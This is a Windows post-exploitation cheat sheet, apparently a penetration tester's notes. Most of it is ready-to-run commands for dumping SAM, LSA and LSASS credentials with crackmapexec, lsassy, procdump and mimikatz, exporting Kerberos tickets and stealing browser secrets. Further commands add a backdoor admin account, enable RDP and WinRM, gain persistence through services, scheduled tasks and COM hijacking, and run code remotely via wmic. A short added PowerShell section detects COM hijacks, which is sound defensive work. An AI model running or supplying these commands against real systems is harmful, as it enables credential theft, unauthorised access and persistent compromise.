Post-Ex Windows
Dump secrets
LSA
crackmapexec smb perim_up.txt -u '<user>' -d '<domain>' -p '<pass>' --lsa
SAM
crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> --sam
reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
LSASS
crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> -M lsassy
lsassy -d '.' -u 'Administrateur' -H '<hash>' <ip>
lsassy -d <domain> -u <user> -p <pass> <ip>
./spraykatz.py -u <user> -p <password> -t <ip>
pypykatz lsa minidump lsass.dmp
procdump.exe -accepteula -ma lsass.exe c:\WINDOWS\Temp\lsass.dmp
.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit
Kerberos
.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit
Browser secrets
sharpchrome.exe
Create/add new local admin account
net user <user> <pass> /add
net localgroup "Administrators" <user> /add
Enable WinRM
Enable-PSRemoting -SkipNetworkProfileCheck -Force
Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Add user to RDP group
net localgroup "Remote Desktop Users" <user> /add
Create service
New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic
Start-Service syshell
sc \\127.0.0.1 create ServiceName binpath= "C:\windows\system32\calc.exe"
\\127.0.0.1 (the target host) is optional
To check that the service is working, you can reboot the host like this:
wmic /node:192.168.1.2 os get buildnumber
then
wmic /node:192.168.1.2 os where buildnumber="<Number>" call reboot
Execute binary using WMIC
wmic /node:127.0.0.1 process call create "C:\windows\system32\calc.exe"
/node is optional
Stop process
Run this to get the process id: sc \\127.0.0.1 query ServiceName
then: wmic /node:127.0.0.1 process where processid=<PID> call terminate
/node is optional
and then: taskkill /S 127.0.0.1 /PID <PID> /F
/S is optional
Create Scheduled tasks
schtasks /create /S 192.156.1.2 /tn <name> /sc once /sd 01/01/1910 /ru system /tr "C:\windows\system32\calc.exe"
Other
schtasks /create /S 127.0.0.1 /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30
/ru and /S are optional.
To check that the task has been created, run: schtasks /S 192.156.1.2 /query /tn <name>
COM hijack
schtasks /query /xml > tasks.xml
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg export "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32" export.reg
# In export.reg, change the HKLM path to HKCU and replace the DLL path, then import it
reg import export.reg /reg:64
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
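Added example (not part of the original notes): a defensive check for exactly the registration the steps above create, a per-user InprocServer32 entry that shadows the machine-wide one. The function name Get-ComHijackCandidates and the flagging rules are my own; it only reads HKCU and HKLM, not the Wow6432Node view.

```powershell
# Added example, not from the original notes: list HKCU CLSID registrations whose
# InprocServer32 DLL differs from the HKLM twin, is missing on disk, or lives outside
# the usual system locations. Non-elevated processes consult HKCU\Software\Classes
# before HKLM, which is why a per-user override takes effect.
$userClsid    = 'HKCU:\Software\Classes\CLSID'
$machineClsid = 'HKLM:\Software\Classes\CLSID'

function Get-ComHijackCandidates {
    if (-not (Test-Path $userClsid)) { return @() }
    Get-ChildItem -Path $userClsid -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid   = $_.PSChildName
        $userKey = "$userClsid\$clsid\InprocServer32"
        if (-not (Test-Path $userKey)) { return }
        $userDll = (Get-ItemProperty -Path $userKey -ErrorAction SilentlyContinue).'(default)'
        if (-not $userDll) { return }

        $machineKey = "$machineClsid\$clsid\InprocServer32"
        $machineDll = $null
        if (Test-Path $machineKey) {
            $machineDll = (Get-ItemProperty -Path $machineKey -ErrorAction SilentlyContinue).'(default)'
        }

        # Expand %SystemRoot% and strip quotes before comparing or checking the file.
        $expanded = [Environment]::ExpandEnvironmentVariables($userDll).Trim('"')
        $reason = @()
        if ($machineDll -and
            $expanded -ne [Environment]::ExpandEnvironmentVariables($machineDll).Trim('"')) {
            $reason += 'HKCU overrides HKLM with a different DLL'
        }
        if (-not (Test-Path -LiteralPath $expanded)) { $reason += 'DLL path does not exist' }
        if ($expanded -notmatch '^[A-Z]:\\(Windows|Program Files)') {
            $reason += 'DLL outside Windows/Program Files'
        }

        if ($reason.Count -gt 0) {
            [pscustomobject]@{
                CLSID      = $clsid
                UserDll    = $userDll
                MachineDll = $machineDll
                Reason     = ($reason -join '; ')
            }
        }
    }
}

Get-ComHijackCandidates | Format-Table -AutoSize
```

Run it as the user whose hive you want to inspect; the HKCU hive of another logged-on user is not visible to this session.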
Disconnect User
rwinsta /server:192.168.1.2 <sessionId>
To get the sessionId, run:
qwinsta